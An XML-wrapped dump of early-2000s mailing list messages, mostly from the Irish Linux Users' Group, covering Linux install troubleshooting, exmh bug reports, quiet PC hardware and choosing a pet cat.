In Fight Club, Tyler Durden destroys this nesting instinct by *bombing* 
Jack's apartment. Hmmmm. 
Where you going with this, Ikea boy?To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I had the same problem when installing Win on it and eventually sorted it
&gt; out by disabling the infrared port. Enter your bios and try disabling your infrared port in the bios.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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 </t>
  </si>
  <si>
    <t xml:space="preserve">Hi Gianni,A very good resource for this is:
http://linux-laptop.net/
or:
http://www.mobilix.org/They have walk through guides for an umber of latops, highlighting what
to look out for.Have a look there, and let us know if you succeed.Cheers,Phil TrickettOn Wed, 2002-12-04 at 11:36, Gianni Ponzi wrote:
&gt; Hi all
&gt; 
&gt; 
&gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my
&gt; laptop. I can start the install but after about 2min, the whole pc just
&gt; dies.
&gt; I know it's not a Linux prob and here is what I have encountered:
&gt; 
&gt; I had the same problem when installing Win on it and eventually sorted it
&gt; out by disabling the infrared port. I'm guessing this might be same prob
&gt; although I'm not sure. I am very new to Linux so it's not that easy for me
&gt; to work it out. I did manage to follow the setup procedure at one stage
&gt; (using images on disks) and it cuts out either as it's trying to verify what
&gt; CD-Rom I have or just after (hence my suspicion of the infrared port again).
&gt; 
&gt; can anyone help ?
&gt; 
&gt; thanks
&gt; Gianni
&gt; 
&gt; 
&gt; ************************************************************************
&gt; This e-mail and any files transmitted with it are confidential
&gt; and intended solely for the use of the individual or entity to
&gt; which they are addressed. If you have received this e-mail
&gt; in error, please notify the EPA postmaster - postmaster@epa.ie
&gt; 
&gt; The opinions contained within are personal to the sender and 
&gt; do not necessarily reflect the policy of the Environmental 
&gt; Protection Agency.
&gt; 
&gt; This footnote also confirms that this e-mail message has been
&gt; swept by MIMEsweeper for the presence of computer viruses.
&gt; 
&gt; ************************************************************************
-- 
Philip Trickett 
TechWorks Marine Ltd-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Gianni Ponzi wrote:
&gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my
&gt; laptop. I can start the install but after about 2min, the whole pc just
&gt; dies.Can you disable DMA and see if this makes a difference?Nick-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Neale Pickett  writes:&gt; Skip Montanaro  writes:
&gt; 
&gt; &gt; Yes.  It also seems to me that web page content filtering proxies (you
&gt; &gt; know, keeping your kids or employees from visiting XXX websites) would
&gt; &gt; be another good application of the technology.
&gt; 
&gt; Not to mention IDS (Intrusion Detection Systems).
&gt; 
&gt; IANAS but I have a friend who is, and he's suggested to me a few times
&gt; that it would be very interesting and possibly fruitful to apply
&gt; Bayesian analysis to network security.  But I think I'm going to have to
&gt; pull out the probab/stats book from college before I embark on such a
&gt; thing :)I have half a mind to see how it works as a replacement for gnus'
adaptive scoring.  A harder problem than spam filtering, I guess, but
it might be interesting.Cheers,
M._______________________________________________
Spambayes mailing list
Spambayes@python.org
http://mail.python.org/mailman/listinfo/spambayes
</t>
  </si>
  <si>
    <t xml:space="preserve">
Hi,I think you need to give us a little more detailed information.On Wed, 04 Dec 2002, Gianni Ponzi wrote:&gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my
&gt; laptop. You get _exactly_ the same problem with Suse and RedHat, is that right?
What versions of these have you used?&gt; I can start the install but after about 2min, the whole pc just
&gt; dies.As in freezes, reboots?  Do you get any errors?&gt; I know it's not a Linux prob and here is what I have encountered:
&gt; 
&gt; I had the same problem when installing Win on it and eventually sorted it
&gt; out by disabling the infrared port. Did you disable it in the BIOS or in windows?&gt; I'm guessing this might be same prob although I'm not sure. I am very new
&gt; to Linux so it's not that easy for me to work it out. I did manage to
&gt; follow the setup procedure at one stage (using images on disks) and it
&gt; cuts out either as it's trying to verify what CD-Rom I have or just after
&gt; (hence my suspicion of the infrared port again).1. What laptop is it?  What is the Processor and how much RAM does it have?2. You cannot simply boot off the cdrom?  It must be quite an old laptop
then or else cdrom booting is disabled in the BIOS.  Is the cdrom external
or strange in some way?Gavin-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Tue, 20 Aug 2002 17:27:47 -0500
    From:        Chris Garrigues 
    Message-ID:  &lt;1029882468.3116.TMDA@deepeddy.vircio.com&gt;
  | I'm hoping that all people with no additional sequences will notice are
  | purely cosmetic changes.Well, first, when exmh (the latest one with your changes) starts, I get...can't read "flist(totalcount,unseen)": no such element in array
    while executing
"if {$flist(totalcount,$mhProfile(unseen-sequence)) &gt; 0} {
	FlagInner spool iconspool labelup
    } else {
	FlagInner down icondown labeldown
    }"
    (procedure "Flag_MsgSeen" line 3)
    invoked from within
"Flag_MsgSeen"
    (procedure "MsgSeen" line 8)
    invoked from within
"MsgSeen $msgid"
    (procedure "MsgShow" line 12)
    invoked from within
"MsgShow $msgid"
    (procedure "MsgChange" line 17)
    invoked from within
"MsgChange 4862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inbox {Msg_Show cur}"
    invoked from within
"time [list  FolderChange $folder $msgShowProc"
    (procedure "Folder_Change" line 3)
    invoked from within
"Folder_Change $exmh(folder)"
    (procedure "Exmh" line 101)
    invoked from within
"Exmh"
    ("after" script)which is probably related to my not having an "unseen" sequence anywhere
(certainly not in inbox) - I read all of my outstanding mail before I
tried this new exmh ...Second, I've been used to having a key binding which was to Msg_MarkUnseen
which doesn't seem to exist any more, and I'm not sure what I should replace
that with.   There's obviously a way as the "Sequences" menu does this.
The "Mark Unseen" menu entry in the message "More" menu is still wanting
that function as well...  | For those who have other sequences defined, the window will widen to
  | display the other sequences.Any chance of having that lengthen instead?   I like all my exmh stuff
in nice columns (fits the display better).   That is, I use the detached
folder list, one column.   The main exmh window takes up full screen,
top to bottom, but less than half the width, etc...I have space for more sequences, in the "unseen" window, as long as they
remain once nice narrow window (best would be if the sequences could be
ordered by some preference, then ones which didn't fit would just fall
off the bottom, and not be shown).I'd also prefer it if that window had no unusual background colouring,
just one constant colour - I have been running the unseen window with
background black, on a root window that is all black, with no borders or
other decorations, but made "sticky" - the appearance is just like the
folders with unseen messages (and their counts) are written into the
root window (because it is sticky, this small display follows me around
and do I can see when new mail needs processing).I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I'm visiting appear in the list when that folder is current.
This is just to keep the list size somewhat manageable while remaining
productive (I quite often use a sequence to remember a particular message
in a folder - the name is used only there, and only for one message,
it gives me a handle on the message which remains as the folder is
packed, sorted, etc).I haven't updated my exmh for some time now, so I'm not sure if this
next one is new, or just new since 2.5, but the Sequences menu (on the
bar with New Flist Search ...) only contains "unseen" and "urgent".
It would be useful if it contained all of the sequences that the folder
happens to have defined.   A "New sequence" entry would also be useful
(to mark the message with a sequence name that didn't previously exist,
which can be done now using "Search" and the pick interface, but is
clumsy that way)Actually, you once could, now when I try this, entering a sequence name
in the pick box, and a single message number, or a range N-N in the
list of messages, and no pick attributes at all, I now get ...syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))"
    while executing
"expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($maxmsgid-$minmsgid))"
    (procedure "Ftoc_FindMsg" line 46)
    invoked from within
"Ftoc_FindMsg $msg"
    (procedure "Ftoc_FindMsgs" line 5)
    invoked from within
"Ftoc_FindMsgs $msgids"
    (procedure "Ftoc_PickMsgs" line 5)
    invoked from within
"Ftoc_PickMsgs $pick(ids) $pick(addtosel)"
    (procedure "PickInner" line 13)
    invoked from within
"PickInner {exec pick +inbox -list} {4852 -sequence mercury}"
    ("uplevel" body line 1)
    invoked from within
"uplevel #0 $cmd"
    (procedure "busyCursorInner" line 8)
    invoked from within
"busyCursorInner $cmd $widgets"
    (procedure "busyCursorHack" line 32)
    invoked from within
"busyCursorHack $args"
    ("cursor" arm line 1)
    invoked from within
"switch $busy(style) {
	icon		{busyIcon $args}
	cursorAll	{busyCursor $args}
	cursor		{busyCursorHack $args}
	default		{eval $args}
    }"
    (procedure "busy" line 3)
    invoked from within
"busy PickInner $cmd $msgs"
    (procedure "Pick_It" line 51)
    invoked from within
"Pick_It"
    invoked from within
".pick.but.pick invoke"
    ("uplevel" body line 1)
    invoked from within
"uplevel #0 [list $w invoke]"
    (procedure "tkButtonUp" line 7)
    invoked from within
"tkButtonUp .pick.but.pick
"
    (command bound to event)It has been ages since I did this last though.   I tried adding a Subject
to pick on (easy as I know what's in the message...) which made no difference.
Looks as if something is now saying "1 hit" when before it didn't, or
similar.  | I've also changed the ftoc colorization as discussed briefly on the list a 
  | week or so ago.Any chance of making the current message a little brighter background?
Just to make it stand out a fraction more than it does (maybe this is
more apparent to me than many, as I use very small fonts everywhere,
the background of the ftoc line isn't very wide).Hope this helps.kre_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;Robert Elz said: &gt; I kind of doubt that any pre built-in sequence name is going to be
 &gt; very general.   Even "unseen" can be changed (fortunately that one
 &gt; is easy to find in the MH profile - though whether exmh does that,
 &gt; os just uses "unseen" I haven't bothered to find out).exmh uses the profile setting - it appears as mhProfile(unseen-sequence)
in the code.--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</si>
  <si>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Hi!Is there a command to insert the signature using a combination of keys and not 
to have sent the mail to insert it then?Regards,
Ulises
_______________________________________________
Exmh-users mailing list
Exmh-users@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-users</t>
  </si>
  <si>
    <t>Cheers Padraig.Exactly what I needed.I knew I liked linux !!!Cheers,
Declan
On Wed, Aug 21, 2002 at 12:30:12PM +0100, Padraig Brady mentioned:
&gt; 
&gt; man join-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hi all, I posted the below question to this list so I thought I'd update you
all. Thanks for your suggestions.Well, I'd decided to bite the bullet and spend big on a new case and CPU
fan.I bought a lian-li aluminum case. It was expensive as cases go (stgÂ£133.86)
but I decided, it's a good basis to build any future PC on.
It has 4 x 51/4" drive bays and 6 x 3Â½" drive bays so I should be ok for
future upgrades etc. I have to say it was worth it. Its a pleasure to work
on. It has a slide out tray to mount the Mother Board on, both sides come
off, the drive bays come out...all without using a screwdriver (thumb
screws). Even the edges inside the case are smooth so no banging your hands
off shape edges etc. There are 4 fans inside the case, which can be set to 3
different speeds. There are 4 usb ports on the front of the box too. The box
is big and has loads of room inside.
Oh... and it looks very cool :-)However there are 2 things to look out for. On the Maplins website it says* Up to three 80mm case fans can be fitted!
* ATX Power supply sold separatelyIn fact the case came with 4 fans and a power supply, which is great but I
ordered 2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Mike)So now I can code-in-peace...Justin
&gt; -----Original Message-----
&gt; From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of
&gt; Justin MacCarthy
&gt; Sent: Monday, August 12, 2002 12:56 PM
&gt; To: Ilug@Linux.Ie
&gt; Subject: [ILUG] PC Cases
&gt;
&gt;
&gt; Hi all, I have a Linux box at home that makes a god awful amount of noise.
&gt; Its a Athlon XP 1900+  with a  CoolerMaster fan.  Are they particularly
&gt; noisy? I think its  the case/psu fan. It was a pretty cheap case. So what
&gt; I'm looking for a quieter case/fan/power supply. I know you can get really
&gt; quiet cases if you want to spend, but I'm looking for something in the
&gt; middle ground, available in Dublin.
&gt;
&gt; Anyone recommend anything ? Thanks
&gt;
&gt; Justin
&gt;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</si>
  <si>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On Wed, 21 Aug 2002 12:42:17 BST, Kiall Mac Innes said:
&gt;Hi i have a phillips head skrew thats holding a circut board together i need
&gt;to take it out ASAP and nothing will work, the threads on the skrew are
&gt;almost completly gone, its is a very small skrew that i have to use a
&gt;percision skrewdriver set to remove the skrews any help would be
&gt;appreaciated...Get a very, *very* small set of drill bits.  Start drilling right
through the center of the head, at a slow speed so you don't pop
off and through the board!  Once you have a bit of an indent in,
increase the speed a little bit.If you've made a deepish indent, and the head doesn't pop off, use
the next largest drill bit you have.  Repeat until happy.Eventually the head should just pop off, allowing you to lift the
board off over the shaft of the screw... then ye can take out the
rest fairly easily with a pliers or whatnot.-- 
	Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Dublin said:
&gt; If you copy the files from your disk to the c: partition and mark it as
&gt; active it should work ...Yeah, I figured that, but it doesn't seem to ... well, if that's the case
I'll give it another go tonight, maybe come back with some error messages.Just to clarify for those who didn't understand me initially - I have a
floppy drive installed, but it doesn't physically work. There's nowhere
handy to pick one up where I am, and I don't fancy waiting a few days for
one to arrive from Peats.Thanks for the answers,
Ciaran.
&gt;
&gt; You especially need io.sys, command.com and msdos.sys
&gt;
&gt; your cd driver .sys and read the autoexec.bat and config.sys files for
&gt; hints on what you did with your boot floppy 
&gt;
&gt; P
&gt;
&gt; On Wed, 2002-08-21 at 14:07, Ciaran Johnston wrote:
&gt;&gt; Hi folks,
&gt;&gt; The situation is this: at home, I have a PC with 2 10Gig HDDs, and no
&gt;&gt; (working) floppy drive. I have been running Linux solely for the last
&gt;&gt; year, but recently got the urge to, among other things, play some of
&gt;&gt; my Windoze games. I normally install the windows partition using a
&gt;&gt; boot floppy which I have conveniently zipped up, but I haven't any way
&gt;&gt; of writing or reading a floppy.
&gt;&gt; So, how do I go about:
&gt;&gt; 1. formatting a C: drive with system files (normally I would use
&gt;&gt; format /s c: from the floppy).
&gt;&gt; 2. Installing the CDROM drivers (my bootdisk (I wrote it many years
&gt;&gt; ago) does this normally).
&gt;&gt; 3. Booting from the partition?
&gt;&gt;
&gt;&gt; I wiped all my linux partitions from the first drive and created
&gt;&gt; partitions for Windows (HDA1) Slackware and RedHat. I used cfdisk for
&gt;&gt; this. I made the first drive (hda) bootable. I then installed the
&gt;&gt; windows partition in LILO and reran lilo (installed in MBR). I copied
&gt;&gt; the contents of boot.zip to my new windows partition and tried to boot
&gt;&gt; it - all I get is a garbled line of squiggles.
&gt;&gt;
&gt;&gt; Anyone any ideas? I can't think of anywhere in Athlone to get a new
&gt;&gt; floppy drive this evening...
&gt;&gt;
&gt;&gt; Thanks,
&gt;&gt; Ciaran.
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt; --
&gt;&gt; Irish Linux Users' Group: ilug@linux.ie
&gt;&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription
&gt;&gt; information. List maintainer: listmaster@linux.ie
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>This is a bit of a messy solution but might be useful -If you have an internal zip drive (not sure about external) and
you bios supports using a zip as floppy drive, you could 
use a bootable zip disk with all the relevant dos utils.G.
___________________________
 Graham Smith,
 Network Administrator,
 Department of Computing,
 Institute of Technology,
 Tallaght, Dublin 24
 Phone: + 353 (01) 4042840-----Original Message-----
From: Ciaran Johnston [mailto:cj@nologic.org]
Sent: 21 August 2002 16:22
To: ilug@linux.ie
Subject: Re: [ILUG] Formatting a windows partition from Linux-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Hmm.Make sure you formatted the partition with fat 16 and have made the
partition /dev/hda1 a size such that dos won't have a problem recognising
it!
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>&gt;Sorry for the OT. Just wondering if anybody knows of a similar type mailing
&gt;list specifically dealing with MacOSX?  (which, FYI is a version of BSD)&gt;SlÃ¡n,&gt;TimHi Tim,
It isn't a "version" of anything except NeXTSTEP, with a Mac hackjob.
It has a bastardised, but functional BSD -layer- which sit's atop Mach and
uses case insensitive HFS+ but it isn't really a BSD.(Here's a neat trick, touch "Makefile" and "makefile", notice the lack of
error message but the absence of "makefile", and don't bother formatting for
UFS. The Apple UFS implementation performs like a dog, was frozen in 97,
implemented badly and has not been updated since. HFS+ get's tweaked every
now and then, but enough screaming has them looking at shoving UFS2 in there
somewhere down the road. )Then there's the holdover NeXT inherent weirdness, such as multiple versions
of common Unix files, but none of them do anything, and all changes you
would usually append to them have to go through NetInfo Manager.All in all, I find it to be a functional, if not overly quirky desktop
environment.As for your initial question,
http://www.omnigroup.com/developer/mailinglists/Regards,
Mark.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Conor Wynne wrote:&gt;Dunno Tim, but I'm seriously considering buying one just for osx. But I'm
&gt;gonna wait till they are providing the latest release first.Every new Mac comes with an upgrade 10.2 CD as of last week.
So if you bought one on the 12th, you'd be running 10.2 before the release
this Friday night.&gt;Unless someone is selling some pomme kit for cheapish/swap?Good luck with that, even Mac geeks have a longer upgrade cycle than the
average PC user, but you'd never know...M.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>How many Redhat admins out there use the redhat kickstart?
If you don't use it, how do you install redhat on all your 
workstations, do you do it by hand, with the cds?As we are looking at using Linux at work, I'm looking
into setting up the kickstart. There doesn't seem to
be a lot of documentation around about it.Does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network.Any help with this would be greatly appreciated,
cheers,
deccy.-- 
---------------------------------------
Declan Houlihan
deccy@csn.ul.ie
http://deccy.csn.ul.ie/
----------------------------------------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Tue, 2002-08-20 at 12:10, John P. Looney wrote:
&gt;  Hmm. Yeah, mutt sorta calls the sendmail program directly. But I thought
&gt; it would be very crap if the auth details (username, password) had to be
&gt; hardcoded into the sendmail.cf (and damned if I can work out how to do
&gt; that anyway).Postfix provides a binary called /usr/sbin/sendmail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authenticate.Nick
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>On Wed, Aug 21, 2002 at 02:52:11PM +0800, al@mpsc.ph wrote:
&gt; Could you please help me how to set up a dial-on-demand, what are the
&gt; packages needed,
&gt; and other requirements to get on.
depends on what you are using to dial. for debian put "demand" in
/etc/ppp/peers/. use "idle 600" to set the timeout to 10
minutes(600 secs). im not sure where exactly to put it for other
distros. whereever pppd gets it options from.regards
-- 
Ivan Kellyivan@ivankelly.net-----BEGIN GEEK CODE BLOCK-----
Version: 3.12
GCS d- s+: a--- C++ UL++++ P+++ L+++ E--- W++ N+ o-- K- w--- 
O-- M-- V-- PS+++ PE- Y+ PGP++ t+ 5 X++ R tv+ b+ DI+ D++ 
G e h! r-- y+ 
------END GEEK CODE BLOCK-------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Check out this. Its for compaq kit, but a pc's a pc ;--)http://www.geocities.com/rlcomp_1999/procedures/kickstart-rh70.htmlThere are other articles too.Hope that helps,CW
----------------
How many Redhat admins out there use the redhat kickstart?
If you don't use it, how do you install redhat on all your 
workstations, do you do it by hand, with the cds?As we are looking at using Linux at work, I'm looking
into setting up the kickstart. There doesn't seem to
be a lot of documentation around about it.Does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network.Any help with this would be greatly appreciated,
cheers,
deccy.-- 
---------------------------------------
Declan Houlihan
deccy@csn.ul.ie
http://deccy.csn.ul.ie/
----------------------------------------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>Lacking in a  _____
	     / ___ \
	    / /   \_\
	  _| |__
	 |_   __| 
	  _| |__
	 |_   __|
	   | |     __
	    \ \___/ /
	     \_____/  symbol on stupid solaris, I decided to fall back on good
ole' slang (and being in Limerick, used the local).  Besides, the quid is
no more :(But floppy discs are still quite cheep, aren't they?Paul, way to busy to be doing this.Sure wasn't it Niall Brady  
sometime around Wed, 21 Aug 2002 16:01:39 +0100 said:&gt; On Wed, 21 Aug 2002 15:47:32 BST, Paul Askins said:
&gt; &gt;
&gt; &gt;Option 2, buy a floppy drive, they're only about 15 or 20 yoyos.
&gt; 							   ^^^^^
&gt;   ___  _   _ ___ ____  
&gt;  / _ \| | | |_ _|  _ \ 
&gt; | | | | | | || || | | |
&gt; | |_| | |_| || || |_| |
&gt;  \__\_\\___/|___|____/ 
&gt; 
&gt; [or at worst, squid :-)]
&gt;                        
&gt; -- 
&gt; 	Niall
&gt;-- 
Paul Askins &lt;:)
Email:  Paul Askins The truth of a proposition has nothing to do with its credibility.  And
vice versa.-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri 19 Jul 2002 12:41, Wynne, Conor wrote:&gt; As long as it looks like the cat type Pokemon called "Persian" [It just
&gt; looks like a siamese]You're going to get Significant Frowns from your average cat breeder
if you say you want a cat who looks like a PokÃ©mon.Why is that PokÃ©mon called "Persian", anyway - it looks nothing like a
Persian cat?  It does look like a Siamese or (more likely)
Abyssinian.  If you want one of these breeds, I hope you're prepared
to part with â‚¬BIGNUM; they're not cheap.There aren't a lot of "quality" cat breeders in Ireland, and they tend
not to have many kittens for sale, so I don't know how feasible it is
to get a Siamese or Abyssinian in a hurry.  "Not very", is my best
guess.&gt; I see the Burmese are nice but I like the pointy ears of the
&gt; Siamese.Siamese *in general* aren't the friendliest of cats; they tend to be
slightly overbred and you end up with hissing maniacs as a result.
Abys tend to be nicer, and Burmese nicer still.  You can be lucky with
individual cats, though.         Colm-- 
Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
Santaclaustrophobia: Fear of crowded holiday shopping.
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks Colm,-----------
&gt;You're going to get Significant Frowns from your average cat breeder
&gt;if you say you want a cat who looks like a PokÃ©mon.
-----------;-) Yep I know, but wee Daisy really loves Pokemon but she loves "persians"
equally, actually any cat really, its really me that wants the pokemon style
cat ;)-----------------
&gt;Why is that PokÃ©mon called "Persian", anyway - it looks nothing like a
&gt;Persian cat?  It does look like a Siamese or (more likely)
&gt;Abyssinian.  If you want one of these breeds, I hope you're prepared
&gt;to part with â‚¬BIGNUM; they're not cheap.---------
Yep 450 yoyo's for a wee one, thats a lot of fish food. And I might not even
get one in the Republic. An Abssynian you say looks like the pokemon
Persian? That would qualify nicely.Thanks for the advice ladies, I now have TWO options. At least I still have
till Haloween before Daisy turns 5. D-Day. Regards
CW-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">You could pay a visit to your local cat sanctuary|cats home|shelter|pound and see if they have a beastie which matches your search terms (healthy + looks like Persian + good with kids); they won't charge you $ARM+LEG (probably they'll just ask for a donation) and I doubt your daughter will mind much where the cat came from.  The cat certainly won't mind, if he/she is well cared for afterwards!Do take the cat to a vet for a checkup and make sure it gets the proper shots, etc.  Might be a good idea to have the "snip" done too while you're there. (the cat, not you!!)  Most sanctuaries will make sure these jobs are already done but you should make sure.A word of warning, some cats in sanctuaries will have been mistreated in past lives and might not be good with kids, or could be quite nervous.  Bring your daughter to see the cat you've chosen to see how they react to one another.Ciaran (0wned by a consortium of felines)-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, 
I'm looking to build a completely silent pc. It's gonna be a gateway for
a wireless network and will sit in my room (as my room is only
spitting distance from the chimney where i'll be mounting the aerial) 
It has to be completely silent, or it'll do my nut. What do I need? I'll prob use a shitty p166 i have here, it doesnt have a fan, and I'm not
worried about HD noise too much as it'll be idle mostly (should I be?) 
any info would be appreciated. I can't afford one of those lovely new
shoebox size totally silent pcs and I cant use an old laptop as I have a
pci wireless card and cable already bought (160$ or so)And where can I get a fanless psu? I know they exist because the lads
at antefacto had them (lads, where can I get one?). Although I do remember
a slight lack of metal box around the humongous voltage parts!
	Greg-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">hm, looks good:
http://books.slashdot.org/article.pl?sid=02/07/19/1411209&amp;mode=thread&amp;tid=134kevin--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</si>
  <si>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I reckon that the Cat[s] will be more interested in the fish in the gaf.
I've got these huge fish [12inchers currently but still growing].I know someone else with them too alonmg with a couple of cats, anyway one
day the cats sat on top of the tank waiting for the fish to do a swim-by and
they readied their paws for the kill. Trouble is the fish were also
interested in a feed and they were significantly faster than the cats. [They
could'nt actually hurt them as they only eat fish/very small rodents] in the
wild. But the cats got the fright of their lives and now they just sit
across the room from the fish warey of approaching the glass ;-)Personally I've been bitten many times, but only drew blood once so far.I wan't to thank all that replied to my totally OT mail, I never knew that
so many people were into our wee friends. CW-----------------
On Sat, 20 Jul 2002, kevin lyda wrote:&gt; what is this obsession of yours with cats that hunt? not my obsession - evolutions.anyway.. i dont like mice and rats, esp. not in the house. and we've
not had one in the house since we got our present cat.&gt; you realise that while cats will sometimes bring birds to your bed,
&gt; it's the wrong kind of bird...  :):)its mostly mice though. and they will eventually (after a few summers)
stop bringing their kills back to the house, once they realise that
you're not interested and are never going to learn to hunt.(they're trying to teach you hunting basically. they do the same with
kittens - first bring back kills, and then later they bring back live
but injured prey for the kittens to practice on).although they'll still bring back stuff on occassion.&gt; kevin--paulj
-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 20 Jul 2002 12:06:35 BST, Greg Farrel said:
&gt;
&gt;D'oh. I ment to say that I cant use a laptop, as I have a pci wireless
&gt;card and the cable for it (about 180 dollars). So it has to be a pc, with
&gt;a pci 2.2 connector (ie some pentiums, and anything above)There's some place in the UK that sells loads of silent gear...
can't remember the name though... a google for "silent pc" or the
like should turn it up.-- 
	Niall-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 20 Jul 2002, kevin lyda wrote:&gt; what is this obsession of yours with cats that hunt? not my obsession - evolutions.anyway.. i dont like mice and rats, esp. not in the house. and we've
not had one in the house since we got our present cat.&gt; you realise that while cats will sometimes bring birds to your bed,
&gt; it's the wrong kind of bird...  :):)its mostly mice though. and they will eventually (after a few summers)
stop bringing their kills back to the house, once they realise that
you're not interested and are never going to learn to hunt.(they're trying to teach you hunting basically. they do the same with
kittens - first bring back kills, and then later they bring back live
but injured prey for the kittens to practice on).although they'll still bring back stuff on occassion.&gt; kevin--paulj-- 
Irish Linux Users' Group Social Events: social@linux.ie
http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 01:40:56PM +0100, Paul Jakma wrote:
&gt; another good place to find cats is a local farm, as farms tend to have
&gt; lots of cats. pick a healthy looking kitten and bring it off to vet
&gt; for shots etc. as it probably wont have had any. a plus side is that
&gt; if you get a slightly older kitten (say 2 months) it'll have some
&gt; hunting experience.what is this obsession of yours with cats that hunt?  you realise that
while cats will sometimes bring birds to your bed, it's the wrong kind
of bird...  :)kevin--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</si>
  <si>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On Sat, 20 Jul 2002 18:15:12 +0100
kevin lyda claiming to think:&gt; On Fri, Jul 19, 2002 at 10:19:50PM -0700, Rick Moen wrote:
&gt; &gt; Some people strip down old 486 boxes, take out the hard drive, disable
&gt; &gt; the fans, and run the thing from just a floppy drive or a CDR you've
&gt; &gt; burned for the purpose.  
&gt; 
&gt; what about using a pcmcia card and a compaq flash card?  or doing an
&gt; nfs boot to a server in a noiser part of the house?  (the boiler room
&gt; or something like that)
&gt; 
hmm. there are versions of OpenBSD that run from a 32M compact flash IIRC.and antefacto's software ran in 64M.there are CF-&gt;IDE adapters anyway, so get a 256M CF (100â‚¬+), mount it RO,
and use that?/me is also in the market for one of the 60W fanless PSU's that antefacto had,
if someone wants to get a few of them.L.
-- 
     dBP   dBBBBb | If you're looking at me to be an accountant
              dBP | Then you will look but you will never see
   dBP    dBBBK'  | If you're looking at me to start having babies
  dBP    dB' db   | Then you can wish because I'm not here to fool around
